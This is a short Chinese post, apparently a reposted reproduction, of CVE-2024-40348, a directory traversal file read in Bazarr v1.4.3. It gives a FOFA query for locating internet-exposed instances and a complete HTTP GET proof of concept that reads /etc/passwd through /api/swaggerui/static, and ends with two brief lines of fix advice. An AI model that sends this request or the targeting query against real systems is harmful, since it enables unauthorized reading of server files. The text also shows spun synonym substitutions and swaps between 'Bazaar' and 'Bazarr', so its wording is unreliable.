Bazaar v1.4.3 恣意文件读取弊端复现(CVE-2024-40348)
0x01 产物简介Bazarr是Sonarr和Radarr的配套应用步伐,可根据您的要求管理和下载字幕。
0x02 弊端概述
Bazarr存在恣意文件读取弊端,该弊端是由于Bazaar v1.4.3的组件/api/swaggerui/static中存在一个问题,允许未经身份验证的攻击者可使用该弊端实验目录遍历。
0x03 复现环境
FOFA:title="Bazarr"
https://i-blog.csdnimg.cn/direct/3c87441f97a94a02a5c413d3f614afb2.png
0x04 弊端复现
PoC
GET /api/swaggerui/static/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close https://i-blog.csdnimg.cn/direct/24501eaa6cd3427a80cbe77be0b84589.png
0x05 修复建议
关闭互联网袒露面或接口设置访问权限
升级至安全版本
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]